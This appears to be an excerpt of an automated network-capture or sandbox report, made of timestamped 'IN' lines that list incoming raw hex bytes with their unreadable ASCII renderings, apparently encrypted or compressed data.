2022-05-30 12:45:08 UTC	186	IN	Data Raw: fe 4d a4 78 37 0c 16 c4 99 62 a8 c6 ec cd 49 dd 63 e1 53 c4 b5 9f 94 d5 6e 52 75 63 36 32 48 e2 97 a0 92 9f 8f 85 03 fa 63 93 2a bf d1 67 8c 0b 02 94 5d 82 37 86 b7 10 76 bf c6 e7 dd b2 94 93 e6 48 61 6f 8e e5 23 12 41 10 be 6f 55 62 2b c9 9b 1d 1b 42 87 3d d6 cd 2e 83 aa cc f3 48 b3 61 2d f6 2d 6f ec b4 cc 57 eb ae d8 1a c7 70 6c 09 0f 81 bb 60 f2 68 17 6b 06 01 79 aa 56 52 89 10 4c f4 5f 15 6c 21 ba f4 1c e4 8b 4f 83 58 cf f4 96 b8 96 b3 06 36 fa 73 97 4a 3a 46 c0 a1 5c ee 42 ee bd 96 0f db 9e a6 70 2c 26 c3 82 97 28 d7 eb 9a f7 c7 a6 ee c0 89 44 90 56 ee c6 cd 5e 49 ec 11 76 2d d4 ca d7 ce da b2 5b 13 4c 23 46 cd 34 7e 23 23 fb 4a 5a f9 71 29 0c 91 2d b7 04 42 dc ce 8a 31 e6 7a d3 d4 29 db 18 25 6a 3e 03 8b 42 6d cf 13 9c f9 b6 5c e8 81 c8 98 d3 09 9d Data Ascii: Mx7bIcSnRuc62Hc*g]7vHao#AoUb+B=.Ha--oWpl`hkyVRL_l!OX6sJ:F\Bp,&(DV^Iv-[L#F4~##JZq)-B1z)%j>Bm\
2022-05-30 12:45:08 UTC	188	IN	Data Raw: 11 f3 6d dd 37 64 12 5d 67 62 c5 63 15 e0 e4 9a 81 48 18 6f 33 7b e6 c8 2c 79 6b 71 b8 23 79 95 8f 37 96 b7 8a 37 4a e6 b0 d4 5d f9 1e 89 1a 55 0a d2 ab 48 95 7b 27 44 42 c1 73 68 fa 19 16 00 57 5f bc 13 a6 cb ea 63 e3 55 58 9d 95 4a 88 38 e2 7c a8 cc fe f9 35 38 b2 44 db 8d ee 02 36 4e ae 5b 1f 19 16 87 e5 08 c2 41 f9 97 01 70 d2 13 9d f7 c5 ec cb 73 3d 3e 68 41 5e 8a f3 f4 77 ee 01 6d bf 24 02 7b 95 15 4e 3b 7f db 29 56 f0 6a be da ee 36 54 c9 d9 fd 1a 15 5f 40 28 b6 07 48 77 9e e9 a9 05 72 e8 ed eb 54 58 79 83 2e 91 58 80 9a 29 7f 9f 52 84 a6 76 c6 2b db 46 03 be 87 71 85 24 cd b0 cc ab 7b 37 9b f8 b1 b5 21 06 73 f9 e4 73 6b 0f 79 3b 03 97 4f 66 db 94 b1 d7 2f 95 bc 6c ce a5 ff 23 d7 a7 25 9c 44 59 21 98 40 3d 49 3c 53 01 d1 e1 6e 92 12 d2 d5 49 6e c1 Data Ascii: m7d]gbcHo3{,ykq#y77J]UH{'DBshW_cUXJ8\|58D6N[Aps=>hA^wm${N;)Vj6T_@(HwrTXy.X)Rv+Fq${7!ssky;Of/l#%DY!@=I<SnIn
2022-05-30 12:45:08 UTC	189	IN	Data Raw: 65 bb 83 67 93 6f 9f 70 02 cc 94 69 57 a5 46 5b a1 b8 e5 e0 18 1c d1 24 38 55 f6 f7 6d f0 db d8 99 63 79 4a 8c 87 1f df 83 45 0d 4b d7 1b d4 76 7f 3d 70 22 c0 a7 0c c1 c9 94 16 96 dd 78 d1 89 55 7a 25 29 6f 15 af 0a 20 3a af b8 16 dc bd f2 ca 97 42 7a d9 f1 cb ca 52 fb ce 55 8c 81 0c e7 12 71 a1 6e 43 c1 f6 e9 ed 58 7e 29 fc 60 92 17 a6 00 e7 36 66 d9 22 18 26 fd f3 ff 1d 15 e7 b3 76 21 7c ce ef 0e 2e 8b 42 c2 52 82 c4 28 d4 35 46 9e 1c 66 f9 fb 31 c8 3a 12 b3 55 24 74 c2 55 6f b8 df 5c 93 76 e7 5b d3 53 11 dd 32 e6 9d 77 39 9f a5 98 bd 78 5b 62 32 55 f1 95 1b d3 1f 0b 92 c0 25 64 be de 70 01 ea 87 d4 03 95 e2 25 73 76 43 81 9f 69 90 b4 b9 7c ba b2 1d 03 ca 28 4b e4 bd 21 e2 0f 58 22 45 94 be 3a 46 c1 23 38 ea 73 19 43 2a 1e c0 85 f8 b7 75 46 0c b1 33 16 Data Ascii: egopiWF[$8UmcyJEKv=p"xUz%)o :BzRUqnCX~)`6f"&v!\|.BR(5Ff1:U$tUo\v[S2w9x[b2U%dp%svCi\|(K!X"E:F#8sC*uF3
2022-05-30 12:45:08 UTC	190	IN	Data Raw: b4 b3 e5 1a 58 66 4d 6a e0 27 c5 50 06 ae a4 96 14 9e e2 54 b3 22 fe 30 19 2d ec bc e5 99 8b 24 e4 b1 1a 48 dd 97 8a 03 9e 28 82 9c 7f 80 85 23 6a d0 44 2b be 81 ae 0c a1 41 23 56 b3 3b 0b 78 dc 23 7b 64 3b 01 7d 75 0a a8 ed 0d b3 45 2d 53 79 79 6d 71 7a af 65 4c 0f 89 d2 34 37 e8 17 36 cb 2b c7 6a 43 ad eb 76 db 13 85 e4 30 62 5b 00 0a 20 ce 4f fe 63 0b d2 06 aa 30 d5 8e 36 9a fd c0 18 f5 11 c7 8a 11 c3 cc 4c 66 cd 85 f1 e1 94 64 bb 24 b7 9c f5 29 99 e3 8a ce e1 12 b8 55 45 06 84 ca d9 f4 48 5b cf cf aa e9 a2 50 a5 63 7b 42 eb 31 33 ab cf 12 1d 7c 80 c9 12 28 63 13 4b 07 ad 65 5d 91 b7 d4 e6 b0 67 22 ca d6 db 0a 9a f9 5a e4 33 d8 8d 2d 89 7e eb d1 ed 68 86 a5 24 39 bc b2 7f a1 a6 e0 6a 03 1f c6 60 80 2c de 7b 4b 67 a5 10 51 fe f2 61 fb 17 85 94 3f 1f fd Data Ascii: XfMj'PT"0-$H(#jD+A#V;x#{d;}uE-SyymqzeL476+jCv0b[ Oc06Lfd$)UEH[Pc{B13\|(cKe]g"Z3-~h$9j`,{KgQa?
2022-05-30 12:45:08 UTC	191	IN	Data Raw: d5 03 c4 46 ec a6 1f d2 fa 4d 46 49 d2 ad a2 aa bf 8c 47 3e a5 1e ce df a5 e8 b3 da fa aa 80 c8 ab 85 de 98 b0 73 a3 ad 38 59 7d d4 0b 9d db da e0 48 7c 99 77 99 c7 68 86 33 06 f4 3c 01 04 4e 22 90 dc 50 98 27 e0 bc cc d3 cf b5 6a b6 ef b3 38 e6 e2 48 38 b6 c3 43 eb c6 27 13 e5 2b 37 b1 b6 fe 11 77 d9 c3 28 13 02 86 8f 47 dc 51 0e 31 94 84 e1 f1 81 b3 c6 a0 1d 51 be 86 12 8f f7 bf e6 a8 02 b7 f2 ff d7 51 e0 59 54 ff 6f 7c 99 f6 d3 01 e3 10 9a 9d 8c 6e 58 ae 01 7a cb b1 9c 2e cc 5d ff 87 54 cb 01 35 09 f4 49 54 ca 22 cc 12 27 0e 77 e9 d4 c3 49 03 3b b4 2d 3e 73 c3 5e 3c 67 19 36 19 cd b7 69 19 e7 e8 d4 de 64 88 af 6b 93 f3 97 f9 d3 67 f4 70 5b 81 41 ab f5 58 65 7a bf 63 b6 d3 09 ed 40 02 ed ba 88 5a 22 ff a1 6e 66 f2 ac 03 62 29 c7 7c e5 37 dd fe e6 cf 4e Data Ascii: FMFIG>s8Y}H\|wh3<N"P'j8H8C'+7w(GQ1QQYTo\|nXz.]T5IT"'wI;->s^<g6idkgp[AXezc@Z"nfb)\|7N
2022-05-30 12:45:08 UTC	193	IN	Data Raw: f1 7e 67 d4 08 9e 97 cb 17 52 92 ad 10 58 e9 db c6 cf 61 96 13 a9 f5 c0 2f cf c6 5b 6c d1 de d5 7b 2e 8e a2 38 53 40 1b 8a e3 ab e6 84 cb 67 99 0c f3 51 8b 92 94 03 1c 61 45 16 3e 15 f1 3e f5 91 57 7b 81 a7 64 d2 69 d0 f2 d8 b7 ee 7f 94 65 15 2b c8 e7 87 da 14 a9 62 f2 5a 48 a4 38 b6 6d 0d b5 45 c0 80 0c 27 b4 38 2a 0f fb 03 83 6c d6 c8 45 9a 1a ad 72 f8 83 4e 71 86 e1 68 08 e6 0d ed 4f 3a 25 12 82 a6 04 a7 90 00 e1 4f f0 80 cf e5 56 1a 3e b7 db fd 74 d6 5b ec f7 94 44 61 9a 42 3c 2c 67 5d 69 4b 35 c3 b1 a7 f8 9f f1 37 53 38 c3 72 fd 34 91 88 b9 f3 b7 8f d9 7c d5 37 63 53 43 6f 76 fa a2 c0 1c 1a e3 18 4f 7b e3 a3 eb c7 02 18 22 49 31 6a 02 cc ab 40 9d fb 17 d1 be 86 f7 2d 37 c3 93 48 c2 a5 ab 39 50 3b b9 3c a1 d4 39 22 8f cb 04 1e 16 34 5d 16 19 9b 62 76 Data Ascii: ~gRXa/[l{.8S@gQaE>>W{die+bZH8mE'8*lErNqhO:%OV>t[DaB<,g]iK57S8r4\|7cSCovO{"I1j@-7H9P;<9"4]bv
2022-05-30 12:45:08 UTC	193	IN	Data Raw: 25 d5 89 cc 34 c7 cc 44 0d c0 c8 7b 6c 32 b8 79 d9 4a f8 b3 e4 fc bb 2b e5 44 5c 28 ee 33 9a ca 15 02 2b 31 83 0e 38 3a 97 88 c2 f8 a9 23 fd 5b d5 40 cc 15 11 ad 93 0b 1f ab 1c 20 7e 93 a5 f2 d5 23 12 9d 20 d3 f5 eb 0c 82 2f 8c 40 c6 8e 84 e2 44 d5 76 c2 75 4f 0e 89 9a 99 d5 e8 7b c7 8e f2 75 15 02 59 14 bf 3d 0c 52 db 8f 2c 19 7a 4b d4 ca 72 0b b2 81 32 b3 16 0f f7 5b 92 05 ea fa ef 44 d5 dd fb 67 9d 9e 5d a8 19 c6 41 b0 a8 26 e5 52 9e ba 6d 14 89 fa 2d c5 3d cc 68 76 c9 61 9d ed ca fa 38 eb e8 de 5d f5 59 94 58 b0 f4 8a e3 74 7e e3 0f 22 a7 fb 37 50 23 96 f7 f5 1d aa ac ff 9d e1 a9 e2 46 19 be 10 db eb d0 45 00 a2 98 e9 be bc f5 c8 52 81 33 56 81 f7 32 7b e6 45 e9 31 5f 38 8b 17 33 f3 06 a3 e7 ab fe 8c 37 73 fb e0 54 f1 dc 5e 7a a8 7e df 2c 35 5a 1b 1f Data Ascii: %4D{l2yJ+D\(3+18:#[@ ~# /@DvuO{uY=R,zKr2[Dg]A&Rm-=hva8]YXt~"7P#FER3V2{E1_837sT^z~,5Z
2022-05-30 12:45:08 UTC	195	IN	Data Raw: 10 60 4e 81 b8 30 a5 38 c9 c2 7f 08 fd bf 87 97 1c 33 21 c4 f6 1c 92 5f ef 53 c6 80 d0 ef 1b 40 6f 66 8f 4f 64 a4 a6 cf 31 f3 08 ea 75 4c ab 8f e5 c9 fe 63 47 3b 32 fd 9d e0 a4 87 f2 a5 1c df d8 16 a0 72 83 4e c4 ce e5 d4 2b ad be eb 27 7d bb 9d 76 14 ac 2c 6c b0 41 0a 6d a1 c3 33 bf 0f 00 12 37 7a d7 1f 8a 4e ab c5 be 1d de 85 87 c7 a3 b0 b3 a9 6c e6 3f 4e b7 76 c9 07 55 4d 06 84 70 7d e3 18 f4 b7 60 c6 44 ee 57 73 db 43 42 d7 71 41 5c a7 2e 8e fe 92 83 23 0c 28 7d c2 40 f5 41 bc 24 78 84 da f7 92 4a c2 f9 27 8d 1c 31 40 0f 45 63 24 31 45 82 f8 75 dd 1c 35 0a 60 96 2c 30 06 34 b1 b9 79 d7 2c b2 d3 97 fc 0a f6 25 cc ce 4d e6 c2 8c be 3f 94 c1 b0 74 1f ec 37 6e 04 a3 22 86 fb f2 bf bb d8 88 1d 81 ca 81 7b c6 d0 b8 60 19 21 45 d6 a4 16 94 f2 9a 8f 88 83 48 Data Ascii: `N083!_S@ofOd1uLcG;2rN+'}v,lAm37zNl?NvUMp}`DWsCBqA\.#(}@A$xJ'1@Ec$1Eu5`,04y,%M?t7n"{`!EH
2022-05-30 12:45:08 UTC	196	IN	Data Raw: 05 f8 aa 76 54 16 e3 b5 f9 99 32 9c 89 12 43 8c f7 57 14 02 b5 61 76 dc d4 a2 6b e9 6a 67 af c4 7b 83 05 e0 0a df 7a cf 5f 42 95 c2 a7 b9 42 ef 12 92 ac 75 92 70 53 2a 78 b0 3e cc e3 3e c7 49 15 2f 25 b7 7e 13 00 5a c3 c5 cf 51 48 45 8c 09 34 dd 4d 19 c6 a0 1d d0 0a ee 69 05 ac a6 8f 8c ea 27 0d 8d 64 9e d9 09 b3 10 90 83 4c 8d 6f d9 d6 9a d6 60 9f eb 8a 25 ba 34 03 e0 ce c6 e5 ee db 3f d7 0f 0d 8b 85 13 cd ef a7 cd 33 d1 0d 3a fe 2a 22 49 27 fe 6f d6 91 0d b3 00 7b e4 4b 1d 53 9c cd 84 a9 ac a8 e8 75 7e e5 cd af 58 d8 a4 e2 c6 c6 1f b5 b8 17 96 bd 80 c6 b7 70 06 75 d6 ef 65 3f 5b fe 46 cc 9d a3 17 ad 50 98 45 ca 2a d8 0c d2 c8 3f 81 15 cd 28 bd 49 96 c1 a5 fa 2b 8e 3a 08 70 30 7c d8 71 6f f8 d7 ad a1 33 27 77 39 44 23 69 70 8f 05 bb e3 94 eb 4b 11 d1 0f Data Ascii: vT2CWavkjg{z_BBupSx>>I/%~ZQHE4Mi'dLo`%4?3:"I'o{KSu~Xpue?[FPE*?(I+:p0\|qo3'w9D#ipK
2022-05-30 12:45:08 UTC	197	IN	Data Raw: 71 d6 9e 3d af 07 c1 9e 54 90 98 ba 2e 57 31 14 27 26 14 95 0e c6 64 b9 b0 42 61 6c 8e d1 c3 d3 d0 0f 03 d4 c1 52 0f 4c 66 e0 0d d9 46 7e 4e 9a d3 b5 0c 36 14 20 a6 a1 b4 8e 0f 6f 33 fd 41 ba fd 93 3f f3 ad 00 58 16 0f bb 88 47 d8 e5 13 36 53 c3 ae 76 71 a8 0a 40 d3 ec 80 c6 82 34 65 d2 fa 10 6b 9d e0 d6 0a b9 43 1e b0 39 c6 ec a1 c6 3e df b4 a6 5d 4d c9 0e 6b dc b4 09 d6 6f 33 f0 db 88 72 54 b4 cb 3c 17 dd 88 eb 15 42 ec 27 a2 b4 31 ef 1e f6 7e 09 3c 77 f2 74 72 09 2e d4 8c e6 54 97 9a f0 fa b5 4d 6c fe 41 ae 1e 9a 93 51 72 d1 f4 1a 78 15 0b 27 b8 1e ba c3 20 4e 72 85 ae 79 be 1f b2 76 19 a7 50 ef c4 c1 b4 a2 1f 06 9d 39 c6 74 d2 43 b1 fc e8 92 76 e1 61 aa cf aa b7 9c 1c 3a 2f cb 8e 37 22 3e 8f 84 6b fb 2d e9 1c 13 25 e9 46 e4 20 67 43 b6 dd 95 4c 2f 42 Data Ascii: q=T.W1'&dBalRLfF~N6 o3A?XG6Svq@4ekC9>]Mko3rT<B'1~<wtr.TMlAQrx' NryvP9tCva:/7">k-%F gCL/B
2022-05-30 12:45:08 UTC	198	IN	Data Raw: e6 64 ea aa c0 c1 c0 6e d0 9b 82 df 26 f9 77 fe a1 09 38 56 ec c8 5e 3c 53 f1 f6 e4 e7 0a 88 f1 cd a5 61 0b 46 1d 3a 48 83 f5 fd c0 d0 c9 b6 e9 22 ad 40 07 65 2d 70 26 bb de fe 37 a4 00 c0 d0 97 85 18 07 09 25 d6 ff bd 69 37 05 84 1f 58 a2 ce 89 e6 84 87 f5 84 ff 07 2f ff 63 8c d6 cd db 27 9d e3 f1 7d 77 9a ee dd f5 90 e6 7d 6f c1 1a 00 21 34 37 77 8c 11 57 24 ec 74 1d 34 5b 0a 6f 59 d3 01 0d d7 84 d9 b3 ec 42 da 33 a0 62 91 1d 68 f8 61 99 e0 f0 9c e7 65 d4 2e 9d dd 4c c6 d4 b7 a8 d9 ff 77 5e 48 0c 0b 72 78 93 3a c8 44 86 8a df 3e f8 32 7f 38 50 76 9a e2 0c 06 43 bc 5c 58 d9 2b ce 8b fd 08 ce d7 23 ba 72 6b ab b8 7a cc 85 fe 2d 65 eb b3 dd 7d 6d b7 8a 2c 53 fd 66 24 88 8f 1f 10 c4 fa 58 a8 77 89 ff 7d dd 10 34 7c 5c 12 5c dd 8d f2 99 25 cf d9 23 10 96 f6 Data Ascii: dn&w8V^<SaF:H"@e-p&7%i7X/c'}w}o!47wW$t4[oYB3bhae.Lw^Hrx:D>28PvC\X+#rkz-e}m,Sf$Xw}4\|\\%#
2022-05-30 12:45:08 UTC	200	IN	Data Raw: 4a 1d 80 4c 99 0a 38 ee c0 00 77 94 e2 ed 58 e5 bd 80 a0 7b d9 c7 af c6 c8 7a 4d 4e 01 12 09 b4 72 fd f9 d9 bd 5e a9 6f 1a 9e 23 82 3a 53 1f 79 98 a1 6a e6 17 b5 c2 fc b4 a4 90 01 c9 50 7a 54 68 2d 06 03 d0 fe f9 5c 91 fc ac ea fe a3 29 2a 15 1e 84 f9 90 1a bb af 3f d5 e4 99 98 6a 64 8b b7 68 6f f8 17 c1 ca 1a ce af c8 2c da f5 39 14 62 dc 40 51 a5 74 47 97 88 a2 7f 18 2e a9 56 fe 98 7b 8f 7e 9b a8 6a 28 db 98 86 4f e3 c6 07 b1 b2 82 8a 57 9f 6c 07 84 d7 cf 2e fe bb 27 0d 90 d8 a1 2d 00 29 e8 8a 1a 44 df a7 ab cb 77 48 fe 45 9f 0b 0a b6 eb 24 26 17 bc 89 8f c0 ca a1 41 47 3a 97 ce 9a a8 9b fc 08 22 e6 3c 75 a2 e6 c5 e4 f5 61 39 68 ee c7 63 71 e2 0a 9d db ce 02 ae 7a 38 2b 19 ae 95 0f 5e 21 df 23 2c 1f ef 57 e8 63 20 57 dc f7 a5 a0 9c f5 bb 60 01 15 26 17 Data Ascii: JL8wX{zMNr^o#:SyjPzTh-\)*?jdho,9b@QtG.V{~j(OWl.'-)DwHE$&AG:"<ua9hcqz8+^!#,Wc W`&
2022-05-30 12:45:08 UTC	201	IN	Data Raw: be 28 0b 11 8e f2 04 77 4d 5d fd d2 30 53 1a 9e 8a f4 22 33 bd 8e 05 c6 c7 e4 0d 66 32 ad b8 08 e9 de 5d 16 e8 92 12 f7 3c c6 4a 2f 8e a8 70 cd 67 a2 b2 90 bf e0 e3 3f d1 dc 2a 03 31 e1 a9 3e 16 c3 45 c7 63 ec d0 e5 08 a2 98 e9 81 c0 e7 7d c3 b6 00 0c 9f 4f f3 3d e6 48 d8 1d 4f 19 21 f4 5a 3e 76 4f 39 5d e9 9c 9b 09 c4 1f 9e 8d c4 2c dc 64 15 be dd 47 e1 b4 c4 bc 6d fd fa a6 ba a1 1e 39 f1 98 06 ec 41 f0 49 b7 ff b6 53 9b 98 aa a1 c5 03 08 03 63 bb 78 e2 79 5a cf 54 de 6f 82 0a 4c a9 77 78 a9 c5 42 05 c6 6e e0 29 68 60 f7 59 cc c9 eb b9 06 b2 e3 6c 03 96 c9 d3 79 49 22 7d 79 f1 eb 8f db d6 73 4f 7f 6a 4f b1 af e8 37 33 9f c2 e0 61 f0 e0 12 1b 77 49 b6 87 7e b1 a2 af 2b 55 ba fd cb 4f b4 40 21 d5 d5 67 0d 37 bd bf d1 d4 7d 64 1f 68 0b 4d cf 03 2e c8 e7 55 Data Ascii: (wM]0S"3f2]<J/pg?*1>Ec}O=HO!Z>vO9],dGm9AIScxyZToLwxBn)h`YlyI"}ysOjO73awI~+UO@!g7}dhM.U
2022-05-30 12:45:08 UTC	202	IN	Data Raw: 2a 62 68 d5 b5 e6 b7 51 ed 12 2f 7b 82 60 e6 1d 78 90 d6 10 01 4b 6c 47 b5 fc 4a 3c 68 c5 a0 c2 7f 96 66 06 62 19 d7 95 9e 61 90 b2 2b 8b 67 24 73 fb 0f dd e2 6e a5 35 15 51 12 94 ed a0 06 8d af 68 39 9f b3 6f 69 05 ff 8f 26 d4 1d 6e f8 d0 c7 9e 7e 94 6d 94 3c 4f 20 a5 45 74 df 8c 06 3e 07 fc 98 4f d4 09 03 77 fb 24 47 02 09 bd 58 07 f2 46 ce fc a2 73 c2 2c cf 00 ba dc 93 58 2d 00 1d f7 11 5e ba f7 df 3e 35 49 7b a9 83 7b 67 f8 29 23 ae 58 43 30 75 ee c3 fb 92 84 0f 2f 3e ce d1 2c a1 ba 99 87 39 0e 93 3a 1d d0 87 72 b2 56 91 88 a2 2f 4f 24 5f 17 3c 9d 88 19 7c 56 dc 9d ba d2 f4 40 d9 9e 50 d0 0b 14 35 3a df 42 7c 66 eb 34 e9 47 7d a2 22 63 b2 0e 36 97 12 b2 56 0c c3 55 ec f7 bb fd 7f 88 97 f4 30 33 4f 7a d2 0e f4 3e 83 9c 91 1a 79 e5 de 16 b7 91 d5 4d 38 Data Ascii: *bhQ/{`xKlGJ<hfba+g$sn5Qh9oi&n~m<O Et>Ow$GXFs,X-^>5I{{g)#XC0u/>,9:rV/O$_<\|V@P5:B\|f4G}"c6VU03Oz>yM8
2022-05-30 12:45:08 UTC	204	IN	Data Raw: 65 84 30 bc 0e 91 30 d3 ea fe d1 79 ea f6 67 3a 8c 95 9d 8e 35 c3 42 23 0a d8 12 8f 6e b7 ab 29 f9 e8 75 32 e4 cd af 58 1d 6b 03 7f d3 0f a4 a9 52 a5 2b e0 93 8a 23 7a cb 86 27 16 ba 98 48 8a b5 2e d6 d7 06 bf cd c3 4f 40 a4 c1 af d9 14 75 85 d7 10 ff c2 e4 c8 22 4e fd 4d 61 b0 e7 24 2d dd 87 e8 f8 1a 44 a9 fe 66 73 58 4c 95 81 73 bb c7 bb 8b 00 34 52 35 93 29 28 60 43 07 fd 2f b7 6f 21 57 57 72 e1 cf 63 69 96 fa d8 88 0c a1 c2 2d aa f5 04 c9 ef c6 cb 34 c7 fe 07 a2 a0 69 c3 be 6d c3 4a db b7 08 3e 65 14 e7 65 d4 08 48 ac 9a c4 29 a1 08 0d fd 08 6c 54 43 a9 9e fd 55 77 0e fd 1a f2 c2 ae 8d 85 8e 11 dc 75 23 4e 2e 0d 74 3b 78 6e 6a 96 2b 64 a2 2a d2 6e 05 c8 36 cb db 0d 92 e2 43 ed d8 01 95 93 bd 21 44 1c 32 bd 17 1a ae b7 37 b8 e4 ee 06 2e d2 84 e8 b3 21 Data Ascii: e00yg:5B#n)u2XkR+#z'H.O@u"NMa$-DfsXLs4R5)(`C/o!WWrci-4imJ>eeH)lTCUwu#N.t;xnj+d*n6C!D27.!
2022-05-30 12:45:08 UTC	205	IN	Data Raw: ac 08 44 37 d0 f1 9f 6b 04 41 40 76 cc b1 78 29 c1 5a 78 08 74 0a c4 c3 1a 30 02 11 f2 22 85 7b fc 3f e5 0d 9a c1 f6 3b 94 37 7d 7d ef 69 19 8b cb ad f1 1e 59 0c 3b 1f e2 7b 4f 49 ad 19 ee f0 80 25 e3 c6 aa 76 38 89 ec d0 ef e5 20 46 bd 2d 91 f3 d2 e9 a9 69 7a a9 b0 c0 c3 6c 06 d2 a1 e5 45 38 e0 c9 9c 83 fc d9 75 8f 13 25 b1 3f 48 83 ec de c0 3c 73 e6 93 49 cf e1 b9 cb 43 79 4a 09 85 19 c9 cb 97 09 e9 e6 b2 7c af d9 b9 ba 05 63 0f 69 54 20 8b c2 9d f0 e3 25 8e ad c4 77 4c 45 8a 7e 6b f2 9f a3 a6 10 4e 97 c8 d0 d3 b5 b5 db c1 2e f2 8b 0e ad c3 0c fc af df 51 ac 94 07 c9 6a 4d cd 73 cf d1 fd 48 94 99 d8 d7 ef 90 00 5c 9f 79 ba f9 a2 92 69 10 0f 97 48 2d a6 ad 7c de 92 ad ae d9 56 49 44 ad 0e c7 4a 5d 0a ac b3 da c3 a8 4d fc 5d 61 a9 b0 a1 d3 bb 1d e7 3a fa Data Ascii: D7kA@vx)Zxt0"{?;7}}iY;{OI%v8 F-izlE8u%?H<sICyJ\|ciT %wLE~kN.QjMsH\yiH-\|VIDJ]M]a:
2022-05-30 12:45:08 UTC	206	IN	Data Raw: 14 b5 6f 68 21 9b 4a 22 5d 1a b0 0c 89 c0 a5 62 97 1f 85 cf 33 44 2e 30 e8 da 52 98 94 99 f3 4e 19 dc b6 7e 8f d6 5c cc 44 0d 3f 39 50 4a d4 bb 76 d7 b2 dc a7 0c a7 4d bb 54 e9 54 9e 6f 8b ee 38 3e cd 75 21 00 6a 44 78 88 5c 04 d8 cf 2c c1 dd 66 36 45 da cb d1 63 18 08 4f 5b 62 d1 a9 aa 2b 54 09 39 f2 6c 5d 97 7f 13 1b d7 6e 16 1f 42 c1 1d b6 de 42 b4 92 bf 3f 10 6a 26 1a 0b 32 54 0a 4b f1 30 37 75 db 3d 75 df 79 8c e5 47 65 b9 ca 5e 41 1d 45 4a 81 40 6f c8 13 a1 6a cc 3a 31 23 18 91 8f 9b 9c 10 b5 f8 3b f6 45 61 cb 05 b0 50 66 ea 46 35 9c 84 a5 17 d2 7c f6 01 e5 e6 c9 9b 12 8b c5 95 b0 0d e7 e4 52 8d b9 9c 11 cf 3e d6 a1 6f f9 a2 51 d2 62 ad 5e 98 31 e1 63 af 0e d8 68 27 8d 10 24 c3 19 a3 63 a5 e7 4d 76 16 73 2b 9b e9 b1 59 3e b3 89 67 c5 e5 0c 11 3d 14 Data Ascii: oh!J"]b3D.0RN~\D?9PJvMTTo8>u!jDx\,f6EcO[b+T9l]nBB?j&2TK07u=uyGe^AEJ@oj:1#;EaPfF5\|R>oQb^1ch'$cMvs+Y>g=
2022-05-30 12:45:08 UTC	207	IN	Data Raw: f2 7e 66 df 86 4e 90 a5 f0 43 52 06 ae 94 94 aa 79 cd 6d e8 3e 4e fd 4d 08 c7 30 d3 2d 8b 24 82 35 32 84 30 e4 de f3 1d 4f 69 8b 6e 0c 02 7c f3 17 87 e7 1e 0a 0b c1 22 05 07 02 44 33 a2 c0 73 64 77 ed 7f a8 cd da 4e 8c cd 0c 67 07 36 17 b4 62 39 85 49 9b 17 c8 b2 45 8e 76 20 bc 91 8d f1 00 a4 a6 eb 40 a8 2d a0 ca a7 cf 77 ae fa 91 23 d2 ff 3b 70 df 08 00 06 a9 49 b7 c9 b5 48 fd 12 26 0a 11 37 7a c8 d1 3b d6 6a f4 63 e5 90 38 78 39 ba 88 8f 2d cc 15 a1 a9 35 4d 36 7b 27 21 50 b8 b0 8a af 53 23 9c 94 c5 70 5d b3 9d 6b e6 46 74 8b 98 a4 07 fd 5f 8b 84 80 9b 00 25 b6 be 7a 69 b6 db d0 3b 53 cd 8b a9 7e 65 be c4 d3 1e 8f a7 ec 0d 24 00 61 ad 42 0d 02 25 d0 fa c7 71 ea 1d 59 0b 6e 59 6a 70 df 12 3d 9f b3 ec f5 2d 9f 3b a5 13 19 be 9a 89 38 de 7d 6b 93 6b 48 1c Data Ascii: ~fNCRym>NM0-$520Oin\|"D3sdwNg6b9IEv @-w#;pIH&7z;jc8x9-5M6{'!PS#p]kFt_%zi;S~e$aB%qYnYjp=-;8}kkH
2022-05-30 12:45:08 UTC	209	IN	Data Raw: 56 3b b9 4a 7a 15 5c 93 db 43 49 d2 f1 41 82 f2 e9 c6 23 06 8d 37 ab b3 50 a0 b7 38 e5 e0 f6 af cd b7 73 7c 61 9a 6c d5 45 f9 b5 43 b9 e3 3d 7e 14 67 96 4a 2b 59 b5 41 c2 e6 c7 fc 84 a7 40 30 04 75 4b 50 94 3b 7f db cd dd 86 a3 b8 d6 e5 38 d6 e9 cd f2 3d 85 5f ba 80 b6 33 be 3c 0c 05 9d 74 bb b0 e2 3b 5c 8c 77 20 05 2e 12 59 b2 7c 6b 7b 9e b2 20 ca c9 25 82 51 ca 9b 77 38 04 36 cd aa 40 aa d9 8a ef 63 ef 78 65 10 60 e3 d3 8b 86 c9 ea e0 e0 eb 09 a7 57 d4 c8 5a 73 b1 93 98 39 d7 d4 89 16 d5 2a 40 31 c6 46 75 dd cd c3 8d 6d 73 22 21 dd 49 dd c5 3a 59 9e bb 28 c7 2a 1b 51 2b 5c c6 c2 01 2b 70 d2 df 14 e8 97 48 2a a2 17 f8 73 b4 df 22 0b 02 e8 5a 96 41 a4 81 e0 b3 3b 16 da 52 ff 98 11 af e0 b5 49 d4 9f d8 48 bd 96 ec 2f 5c 12 26 bd 89 63 1c 83 39 39 c8 c2 a9 Data Ascii: V;Jz\CIA#7P8s\|alEC=~gJ+YA@0uKP;8=_3<t;\w .Y\|k{ %Qw86@cxe`WZs9@1Fums"!I:Y(Q+\+pH*s"ZA;RIH/\&c99
2022-05-30 12:45:08 UTC	209	IN	Data Raw: d1 f1 58 96 82 2d a7 98 f7 ed ae 0e 55 70 3f 6d 47 e1 c0 fc d1 88 fd 7d b8 7b cb 16 8e 00 de b2 e3 1f 86 b7 9e 07 a8 45 25 1c c3 b6 dd 61 36 71 e4 ab 8f 9e e3 59 4a 16 aa e6 95 33 c7 ea 70 81 5c 33 f5 3a c1 6c 4e 11 68 5c 4f 90 c2 46 ec ad 09 d7 70 d4 03 96 bd 61 0c 7f fb 71 e6 00 6e 4f a0 72 b6 b4 1a dd 86 73 0f ee ab a7 59 fd 9a 23 b2 8f 2d 40 fe f3 3c bc 7e 3d 41 45 f2 fa 3f 34 9d 47 4d ad c9 c3 a3 de 06 e4 48 45 dc 50 3c 31 94 84 6e fb e7 f7 c9 16 63 a1 e1 63 0c 98 49 e2 47 e3 0d 28 33 ff 97 38 23 4e 1f 10 ea b5 1d 83 0c 85 15 1f 10 a2 f2 9b 57 e7 f7 ab 58 49 e8 38 74 00 5e c0 5b 54 c0 35 49 9d 8a 43 a7 cd 49 db a3 7b 4a 6d 22 b6 2d 8c c1 66 9e 88 31 35 01 e3 2a 8b 21 10 48 48 66 f0 38 9a 6c b7 5b 77 50 94 9d ae bc bc 91 66 f4 fd 18 13 33 b4 98 fe 27 Data Ascii: 